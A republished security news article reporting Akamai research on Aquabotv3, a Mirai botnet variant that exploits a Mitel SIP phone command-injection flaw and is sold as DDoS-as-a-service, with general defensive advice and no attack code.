HomeCII/OTThe title rewritten without using double quotes is: Mirai Variant Aquabot Exploits...

The title rewritten without using double quotes is: Mirai Variant Aquabot Exploits Mitel Device Flaws

Published on

spot_img

The infamous Mirai botnet is once again causing chaos, this time with a new variant known as Aquabot. This latest iteration of the botnet is particularly dangerous as it offers distributed denial-of-service (DDoS) as-a-service by targeting vulnerabilities in Mitel SIP phones. What sets this variant apart is its unique ability to communicate with attacker command-and-control (C2).

According to researchers at the Akamai Security Intelligence and Response Team (SIRT), Aquabot exploits a command-injection vulnerability identified as CVE-2024-41710. This flaw affects several Mitel phone models commonly used in corporate environments. The vulnerability leverages an input sanitization issue, allowing attackers to gain root access to the device. The researchers, Kyle Lefton and Larry Cashdollar, detailed their findings in a blog post published on January 29.

Aquabotv3, as Akamai refers to this variant, is the third version of the botnet to emerge. The initial version was discovered in November 2023, built on the Mirai framework with a focus on launching DDoS attacks. The second version added concealment and persistence mechanisms, such as preventing device shutdown and restart, a feature that remains present in the current version.

One of the distinguishing features of Aquabotv3 is a function named “report_kill” that informs the C2 when a kill signal is detected on the infected device. Despite this capability, researchers have not observed any response to this function from the attacker’s command-and-control infrastructure.

Additionally, Aquabotv3 has been advertised as a DDoS-as-a-service offering on platforms like Telegram under different names like Cursinq Firewall, The Eye Services, and The Eye Botnet. These aliases promote services for both Layer 4 and Layer 7 DDoS attacks.

Akamai SIRT uncovered active exploit attempts targeting CVE-2024-41710 through its global network of honeypots in early January. These attempts closely resembled a proof-of-concept released on GitHub by Packetlabs’ researcher Kyle Burns. The exploits aim to execute a shell script called :bin.sh, which then fetches and runs Mirai malware on the compromised system.

Despite efforts to disguise the activity as DDoS testing, threat actors behind Aquabot are actively spreading Mirai malware. The researchers emphasized the importance of securing IoT devices against DDoS threats, as many of these botnets exploit common password libraries. They advised organizations to change default credentials to protect against such attacks.

As Mirai botnets continue to pose a significant threat, organizations must take proactive steps to secure IoT devices and prevent DDoS attacks. By implementing stronger authentication measures and monitoring for indicators of compromise, defenders can mitigate the risk posed by these malicious botnets. Akamai SIRT provided a list of indicators of compromise and rules to assist defenders in identifying and stopping potential threats.

Source link

Latest articles

Attackers conceal malicious code within Hugging Face AI model Pickle files

In the realm of machine learning (ML) models, Pickle stands out as a popular...

Ghidra 11.3 release includes new features, performance enhancements, and bug fixes

The NSA's Research Directorate recently announced the release of Ghidra 11.3, the latest version...

Google Mandiant identifies MSI flaw in Lakeside Software

A vulnerability in a Microsoft software installer developed by Lakeside Software has been discovered,...

Can Your Security Measures Backfire on You?

In the realm of cybersecurity, the age-old concept of breaching defenses to launch an...

More like this

Attackers conceal malicious code within Hugging Face AI model Pickle files

In the realm of machine learning (ML) models, Pickle stands out as a popular...

Ghidra 11.3 release includes new features, performance enhancements, and bug fixes

The NSA's Research Directorate recently announced the release of Ghidra 11.3, the latest version...

Google Mandiant identifies MSI flaw in Lakeside Software

A vulnerability in a Microsoft software installer developed by Lakeside Software has been discovered,...